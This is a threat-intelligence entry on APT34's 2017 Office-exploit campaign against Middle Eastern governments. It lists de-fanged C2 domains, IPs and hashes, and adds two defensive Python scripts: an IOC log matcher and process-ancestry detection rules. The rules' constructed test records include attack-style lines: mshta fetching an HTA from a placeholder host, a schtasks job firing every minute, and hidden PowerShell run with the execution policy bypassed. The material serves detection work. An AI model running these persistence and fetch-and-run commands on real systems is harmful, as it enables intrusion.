Threats Feed | APT34 | Last Updated: 04/02/2026 | Author: Certfa Radar | Publish Date: 07/12/2017

APT34's Utilization of Microsoft Office Vulnerabilities to Compromise Middle Eastern Organizations

  • Actor Motivations: Espionage, Exfiltration
  • Attack Vectors: Vulnerability Exploitation, Backdoor, Downloader, Dropper, Spear Phishing
  • Attack Complexity: High
  • Threat Risk: High Impact / High Probability

Threat Overview

The Iranian cyber espionage group APT34 exploited two Microsoft Office vulnerabilities, CVE-2017-0199 (a flaw in Office's handling of OLE objects that lets a document fetch and execute an HTA file) and CVE-2017-11882 (a stack buffer overflow in the legacy Equation Editor component, EQNEDT32.EXE), to deliver malicious payloads to Middle Eastern governmental organizations. The group sent spear-phishing emails with malicious .rtf attachments; opening an attachment triggered the exploit, which dropped and executed a chain of scripts. The final payloads were POWRUNER, a PowerShell backdoor that executes commands, transfers files and captures screenshots, and BONDUPDATER, a PowerShell downloader. Together they established persistence and command-and-control (C2) communication, and BONDUPDATER generates its C2 subdomains with a domain generation algorithm (DGA), which makes a static domain blocklist an unreliable control on its own.

Detected Targets

Type | Description | Confidence
Sector | Government Agencies and Services. The report indicates that an unnamed government organization in the Middle East was targeted by the attacker exploiting the Microsoft Office vulnerability CVE-2017-11882. | Verified
Region | Middle East Countries | Verified

Extracted IOCs

  • anyportals[.]com
  • dns-update[.]club
  • hpserver[.]online
  • mumbai-m[.]site
  • proxychecker[.]pro
  • proxycheker[.]pro
  • 13b338c47c52de3ed0b68e1cb7876ad2
  • 247b2a9fcba6e9ec29ed818948939702
  • 3c63bff9ec0a340e0727e5683466f435
  • 42449dd79ea7d2b5b6482b6f0d493498
  • 4a7290a279e6f2329edd0615178a11ff
  • 52ca9a7424b3cc34099ad218623a0979
  • 635ed85bfcaab7208a8b5c730d3d0a8c
  • 63d66d99e46fb93676a4f475a65566d8
  • 841ce6475f271f86d0b5188e4f8bc6db
  • 9267d057c065ea7448aca1511c6f29c7
  • a0e6933f4e0497269620f44a083b2ed4
  • a3fcb4d23c3153dd42ac124b112f1bae
  • b2d13a336a3eb7bd27612be7d4e334df
  • bbde33f5709cb1452ab941c08acc775e
  • c87b0b711f60132235d7440add0360b0
  • c9f16f0be8c77f0170b9b6ce876ed7fb
  • d85818e82a6e64ca185edfddba2d1b76
  • dbfea6154d4f9d7209c1875b2d5d70d5
  • e516c3a3247af2f2323291a670086a8f
  • e6ac6f18256c4dde5bf06a9191562f82
  • eaf3448808481fb1fdbb675bc5ea24de
  • ee1c482c41738aaa5964730dcbab5dff
  • eeb0ff0d8841c2ebe643fe328b6d9ef5
  • fb464c365b94b03826e67eabe4bf9165
  • 145[.]239.33.100
  • 148[.]251.55.110
  • 185[.]15.247.147
  • 46[.]105.221.247
  • 82[.]102.14.219
  • 94[.]23.172.164
  • hxxp://dns-update[.]club
  • hxxp://mumbai-m[.]site

Tip: 38 related IOCs (6 IP, 6 domain, 2 URL, 0 email, 24 file hash) to this threat have been found.
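The indicators above are de-fanged (`[.]` for dots, `hxxp` for `http`) and mix file hashes, IP addresses, domains and URLs. The Python script below is an added example and is not code from the feed or the source report: it refangs a subset of the listed indicators, classifies each one, and scans a handful of log lines constructed for the example (DNS, proxy and file-hash records; the client addresses, file path and subdomain are invented). Domains are matched by suffix rather than as exact hosts, because BONDUPDATER's DGA produces fresh subdomains under its C2 domain, so an exact-host match would miss most of its traffic.

```python
import ipaddress
import re

# Subset of the de-fanged indicators listed on this page; the full list can be
# pasted in unchanged since the format is identical.
DEFANGED_IOCS = [
    "anyportals[.]com",
    "mumbai-m[.]site",
    "185[.]15.247.147",
    "hxxp://dns-update[.]club",
    "c9f16f0be8c77f0170b9b6ce876ed7fb",
]


def refang(ioc):
    """Undo the usual de-fanging conventions and normalise case."""
    s = ioc.strip().replace("[.]", ".").replace("(.)", ".").replace("{.}", ".")
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s.lower()


def classify(ioc):
    """Return one of: md5, sha1, sha256, url, ip, domain, unknown."""
    if re.fullmatch(r"[0-9a-f]{32}", ioc):
        return "md5"
    if re.fullmatch(r"[0-9a-f]{40}", ioc):
        return "sha1"
    if re.fullmatch(r"[0-9a-f]{64}", ioc):
        return "sha256"
    if re.match(r"https?://", ioc):
        return "url"
    try:
        ipaddress.ip_address(ioc)
        return "ip"
    except ValueError:
        pass
    if re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}", ioc):
        return "domain"
    return "unknown"


def load_iocs(defanged):
    """Refang and bucket indicators; the host of a URL indicator is also stored as a domain/IP."""
    buckets = {k: set() for k in ("md5", "sha1", "sha256", "ip", "domain", "url")}
    for raw in defanged:
        ioc = refang(raw)
        kind = classify(ioc)
        if kind == "url":
            buckets["url"].add(ioc)
            host = re.sub(r"^https?://", "", ioc).split("/")[0]
            host_kind = classify(host)
            if host_kind in buckets:
                buckets[host_kind].add(host)
        elif kind in buckets:
            buckets[kind].add(ioc)
    return buckets


def matching_domain(host, domains):
    """Suffix match so a DGA-generated subdomain of a listed C2 domain still hits."""
    host = host.lower().rstrip(".")
    for d in domains:
        if host == d or host.endswith("." + d):
            return d
    return None


# Constructed log lines for the example; not real telemetry from the incident.
LOG_LINES = [
    "2017-11-29T09:12:01Z DNS query=kq7x2pd9mz41.mumbai-m.site client=10.0.0.21",
    "2017-11-29T09:12:03Z DNS query=www.example.com client=10.0.0.21",
    "2017-11-29T09:13:10Z PROXY dst=185.15.247.147:80 url=http://185.15.247.147/u.txt client=10.0.0.21",
    "2017-11-29T09:14:00Z DNS query=dns-update.club client=10.0.0.33",
    "2017-11-29T09:15:00Z AV file=C:\\Users\\alice\\AppData\\Local\\Temp\\update.ps1 md5=C9F16F0BE8C77F0170B9B6CE876ED7FB",
]


def scan(lines, iocs):
    """Return sorted (line_index, kind, indicator) tuples for every IOC hit."""
    hits = set()  # a set so one line matching the same indicator twice is reported once
    for i, line in enumerate(lines):
        for key, val in re.findall(r"\b(query|dst|url|md5)=(\S+)", line):
            val = val.lower()
            if key == "md5":
                if val in iocs["md5"]:
                    hits.add((i, "md5", val))
            elif key == "dst":
                ip = val.rsplit(":", 1)[0]
                if ip in iocs["ip"]:
                    hits.add((i, "ip", ip))
            else:  # query or url: reduce to a host name, then suffix-match or IP-match
                host = re.sub(r"^https?://", "", val).split("/")[0].rsplit(":", 1)[0]
                d = matching_domain(host, iocs["domain"])
                if d:
                    hits.add((i, "domain", d))
                elif host in iocs["ip"]:
                    hits.add((i, "ip", host))
    return sorted(hits)


if __name__ == "__main__":
    for hit in scan(LOG_LINES, load_iocs(DEFANGED_IOCS)):
        print(hit)
```

Hash indicators are compared after lower-casing both sides, since AV and EDR products disagree on hex case; the hash alone identifies a sample, so the matched file path is reported only as context.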

Overlaps

OilRig | OilRig's Poison Frog: From PowerShell Backdoors to Cisco AnyConnect Disguises

Source: Kaspersky - December 2019

Detection (one case): c9f16f0be8c77f0170b9b6ce876ed7fb

APT34 | APT34's Enhanced Cyber Espionage: BONDUPDATER and POWRUNER Malware Variants Unveiled

Source: Booz Allen - February 2018

Detection (six cases): 185[.]15.247.147, 82[.]102.14.219, 94[.]23.172.164, c9f16f0be8c77f0170b9b6ce876ed7fb, proxychecker[.]pro, proxycheker[.]pro

Hint: Overlaps are extracted automatically by examining the IOCs associated with all indexed threats and actors.

FAQs

Understanding the APT34 Campaign

A cyber threat group known as APT34 ran a spear-phishing campaign against organizations in the Middle East. The emails carried malicious documents that exploited a vulnerability in Microsoft Office (specifically in the Equation Editor component) to infect computers with no user interaction beyond opening the file.

The attack is attributed to APT34, a group that loosely aligns with public reporting on an entity known as "OilRig." They are a capable group known for targeting entities in the Middle East and having access to their own malware development resources.

The primary goal appears to be establishing a "backdoor" into the victim's network. This allows the attackers to remotely control the infected computer, execute commands, upload/download files, and take screenshots of the user's activity.

The report specifically identifies organizations in the Middle East region as the primary targets. Historically, this group has targeted banks and other organizations in this area.

The attackers sent emails with a malicious .rtf (Rich Text Format) attachment. When opened, the file exploited a flaw in Microsoft Office to run a series of scripts. These scripts downloaded malicious software, hid it on the system, and set up a schedule to ensure the malware ran automatically every minute.

The most effective defense is to apply the Microsoft Office updates that patch CVE-2017-0199 and CVE-2017-11882 immediately; note that Microsoft went further in its January 2018 updates and removed the vulnerable Equation Editor component from Office altogether. Organizations should also search for the malicious file names listed in the source report and monitor for unusual process behaviour, in particular the Equation Editor process (EQNEDT32.EXE) launching command interpreters or scripts, Office applications launching mshta.exe, and scheduled tasks created to run every minute.
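The behaviours described above (the Equation Editor launching commands, a scheduled task that fires every minute, a dropped script handing off to PowerShell) translate directly into process-ancestry detection rules. The Python script below is an added example and is not code from the feed or the source report: it runs four such rules over Sysmon-style process-creation records constructed for the example. The file names, task name, timestamps and the example.invalid URL are placeholders, not indicators from the incident. It also encodes the caveat a rule author needs: WINWORD.EXE starting EQNEDT32.EXE is normal for a document with an embedded equation and is not flagged; only the Equation Editor's own child processes are.

```python
import re

# Constructed process-creation records in a Sysmon Event ID 1 style. They are
# invented for this example and are not telemetry from the incident.
EVENTS = [
    {"ts": "09:11:58", "parent": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "cmdline": r'"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'},
    {"ts": "09:11:59", "parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c "%TEMP%\update.bat"'},
    {"ts": "09:12:00", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /F /sc minute /mo 1 /tn "UpdateCheck" /tr "wscript //b %TEMP%\update.vbs"'},
    {"ts": "09:12:05", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "%TEMP%\update.ps1"'},
    {"ts": "09:20:00", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n'},
    {"ts": "09:21:00", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr backup.cmd'},
    {"ts": "09:30:00", "parent": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/a.hta"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "rundll32.exe", "regsvr32.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}


def basename(path):
    """Lower-cased file name of a Windows path, tolerating quotes and forward slashes."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def minute_task_interval(cmdline):
    """Minute interval of a 'schtasks /sc minute' command line, or None if not a minute schedule."""
    if not re.search(r"/sc\s+minute\b", cmdline, re.IGNORECASE):
        return None
    mo = re.search(r"/mo\s+(\d+)", cmdline, re.IGNORECASE)
    # Assumption for the example: treat an omitted /mo as a one-minute interval.
    return int(mo.group(1)) if mo else 1


def detect(events):
    """Apply four process-ancestry rules; return (ts, rule_id, detail) tuples in event order."""
    alerts = []
    for ev in events:
        parent, image, cl = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"]
        # Rule 1: the Equation Editor has no legitimate reason to start other processes;
        # CVE-2017-11882 exploitation makes it do exactly that.
        if parent == "eqnedt32.exe":
            alerts.append((ev["ts"], "EQNEDT32_CHILD", f"EQNEDT32.EXE spawned {image}"))
        # Rule 2: an Office application starting an interpreter (CVE-2017-0199 chains go
        # Office -> mshta.exe). Office starting EQNEDT32.EXE itself is normal and not flagged.
        if parent in OFFICE_APPS and image in INTERPRETERS:
            alerts.append((ev["ts"], "OFFICE_SPAWNS_INTERPRETER", f"{parent} spawned {image}"))
        # Rule 3: a task scheduled to fire every minute, the persistence interval described above.
        if image == "schtasks.exe" and re.search(r"/create\b", cl, re.IGNORECASE):
            interval = minute_task_interval(cl)
            if interval is not None and interval <= 1:
                alerts.append((ev["ts"], "MINUTE_SCHTASK", cl))
        # Rule 4: a script host handing off to PowerShell (dropped .vbs launching the .ps1 payload).
        if parent in SCRIPT_HOSTS and image == "powershell.exe":
            alerts.append((ev["ts"], "SCRIPTHOST_POWERSHELL", cl))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Run against the constructed records, the benign Word launch and the daily backup task produce nothing, while the four stages of the described chain each raise one alert; in a real deployment the rules would be fed from Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled.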